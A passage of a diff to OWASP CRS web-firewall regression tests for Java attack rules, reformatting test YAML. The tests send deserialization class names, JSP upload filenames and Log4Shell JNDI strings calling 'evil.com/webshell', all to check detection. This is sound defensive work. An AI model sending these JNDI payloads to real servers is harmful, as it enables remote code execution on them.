"Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=value" + output: + log_contains: "id \"944130\"" + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"org.omg.CORBA\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
index d380970c8..e53d52a3d 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
@@ -2,158 +2,147 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 944140.yaml tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "944140" + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - output: - log_contains: id 
"944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. 
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log_contains: id "944140" + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + no_log_contains: id "944140" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081afde..1042f5a4e 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml 
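Review bot: The new `meta` block of 944140.yaml drops `enabled` and `name` but, unlike the 944150 and 944151 hunks in this same patch which add `+rule_id: 944150` / `+rule_id: 944151` at top level, it gains no `rule_id: 944140`; unless the runner infers the rule id from the file name, the bare numeric `test_id` values can no longer be tied back to the rule, so add `rule_id: 944140` after `description:` for consistency with the sibling files. All nine tests also keep the identical `desc: Java script uploads`, which makes a failing `test_id` hard to place; tests 3 and 8 in particular send `X_Filename` (underscore) while the others send `X-Filename`/`X-File-Name`, and a description such as `desc: Java script upload, underscore header-name variant` would make clear this is deliberate coverage of the header-name variant rather than a typo. Test 9 (`foo.html`, `no_log_contains`) is the only negative case for the file-name check; a `desc` naming it as the negative case would help too.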
@@ -3,436 +3,411 @@ # 944151 should detect the same things as 944150. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944150" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + dest_addr: 